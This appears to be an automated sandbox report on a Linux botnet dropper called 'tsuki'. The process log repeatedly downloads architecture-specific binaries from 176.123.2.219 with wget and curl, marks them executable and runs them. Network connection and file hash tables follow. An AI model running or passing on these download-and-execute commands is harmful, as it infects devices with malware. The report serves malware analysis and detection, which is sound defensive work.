[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |